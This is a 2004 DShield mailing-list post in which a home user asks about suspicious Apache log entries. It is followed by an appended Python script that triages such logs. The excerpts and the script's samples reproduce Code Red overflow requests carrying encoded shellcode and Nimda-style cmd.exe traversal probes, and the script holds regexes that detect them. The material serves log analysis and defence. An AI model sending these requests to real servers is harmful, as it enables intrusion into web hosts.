[Dshield] Suspect HTTP-activity

Martin Agren martin.agren at home.se
Fri Jan 23 18:30:55 GMT 2004


Hello,
I'm a fresh subscriber to this list and the very reason I stumbled upon 
it was that I was investigating some activity that apache logged and 
that made me a little suspicious about the intentions behind the 
requests. So first off, Hello!

I've been trying to go through the most recent archives and while what 
you discuss seems to be both interesting and important, I haven't found 
anything that matches my query.

If this is the wrong place for my question, I can take pointers to other 
lists/sites for an answer. :-)

Below are excerpts from my apache/access.log (I'm running Win2000Pro). I 
haven't publicly announced my web-server in any way -- I just use it for 
development of web-code and invite other developers to check it out.

Most of these logs seem to indicate nothing actually happened 
(404-status), but I'm curious as to what it's all about and if anyone 
might be interested in this information. Any DShield-like service that 
collects apache-logs? ;-)

Most of these requests seem to be someone wanting to list my disk.

Are there any known worms that create these requests? Should I act in 
any way?

Any help is much appreciated!

If anyone wants me to post more logs, I can do so (it's basically just 
the same requests a couple of times).

Martin

218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308
127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1" 404 320
210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET /scripts/nsiislog.dll" 404 -
202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 307
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 305
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 346
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 346
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
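Added example, not part of Martin's post or any reply on the list: a small Python triage script of the kind a defender would run over an access.log like the one above. It parses Apache common-log-format lines, tags each request with an indicator label, and tallies per source host whether any tagged request actually got a 2xx. The labels and regexes are this example's own; the two named patterns rest on the widely documented request shapes of the Code Red worm (GET /default.ida? followed by a long run of filler and %u-encoded bytes) and the Nimda worm (root.exe / cmd.exe?/c+dir with double- and overlong-UTF-8-encoded "..\" traversals). The sample lines are constructed, modelled on the post's excerpts with the long X run shortened.

```python
import re
from collections import Counter, defaultdict

# Apache "common" log format:  host ident authuser [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)\s*$'
)

# Nimda-style "run cmd.exe / root.exe with /c <command>" request shape.
CMD_EXEC_RE = re.compile(r"(?:root|cmd)\.exe\?/c\+", re.IGNORECASE)

# ".." followed by a double-encoded (%25..), malformed (%%35..) or overlong
# UTF-8 (%c0.., %c1..) path separator, or a plain encoded/literal separator.
TRAVERSAL_RE = re.compile(r"\.\.(?:%25|%%35|%c0|%c1|%5c|%2f|/|\\)", re.IGNORECASE)


def parse_line(line):
    """Split one common-log line into its fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # The request field may lack the HTTP version (e.g. 'GET /scripts/nsiislog.dll').
    parts = m.group("request").split()
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "method": parts[0] if parts else "",
        "target": parts[1] if len(parts) > 1 else "",
        "status": int(m.group("status")),
        "bytes": m.group("bytes"),
    }


def classify(entry):
    """Return the list of indicator labels (this example's own names) for one parsed entry."""
    method, target = entry["method"], entry["target"]
    low = target.lower()
    labels = []
    if low.startswith("/default.ida"):
        # Code Red's overflow carries %u-encoded shellcode bytes after the filler;
        # a bare /default.ida request is just a probe for the vulnerable ISAPI filter.
        labels.append("code-red-overflow" if "%u" in low else "default.ida-probe")
    if CMD_EXEC_RE.search(target):
        labels.append("nimda-cmd-exec-probe")
    if TRAVERSAL_RE.search(target):
        labels.append("encoded-dir-traversal")
    if low.endswith(".dll"):
        labels.append("iis-isapi-dll-probe")
    if method == "SEARCH":
        labels.append("webdav-search-method")
    return labels


def summarize(lines):
    """Per-host tally of indicator labels, plus how many tagged requests returned 2xx.

    On a server that has none of the targeted IIS components, every 404 is noise;
    a 2xx on a tagged request is what deserves a closer look.
    """
    report = defaultdict(lambda: {"labels": Counter(), "succeeded": 0, "total": 0})
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        labels = classify(entry)
        if not labels:
            continue
        rec = report[entry["host"]]
        rec["total"] += 1
        rec["labels"].update(labels)
        if 200 <= entry["status"] < 300:
            rec["succeeded"] += 1
    return dict(report)


# Constructed sample lines, modelled on the post's excerpts (X run shortened).
SAMPLE_LINES = [
    '218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET /default.ida?XXXXXXXXXXXXXXXX'
    '%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308',
    '127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1" 404 320',
    '210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET /scripts/nsiislog.dll" 404 -',
    '202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916',
    '194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 307',
    '194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329',
    '10.0.0.5 - - [22/Jan/2004:18:00:00 +0100] "GET /index.html HTTP/1.1" 200 1234',
]

if __name__ == "__main__":
    for host, rec in sorted(summarize(SAMPLE_LINES).items()):
        print(f"{host:16} tagged={rec['total']} 2xx={rec['succeeded']} {dict(rec['labels'])}")
```

The script deliberately reports per host rather than per line: a single source emitting a dozen traversal variants within one second (as 194.47.216.32 does above) is the signature of automated scanning, and the per-host 2xx count answers the practical question of whether any of it landed. On an Apache server on Windows, none of the IIS-specific targets exist, so the expected outcome is exactly the wall of 404s in the post; the line worth noting is the SEARCH request that returned 200, which only means Apache answered the method, not that anything was exploited.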
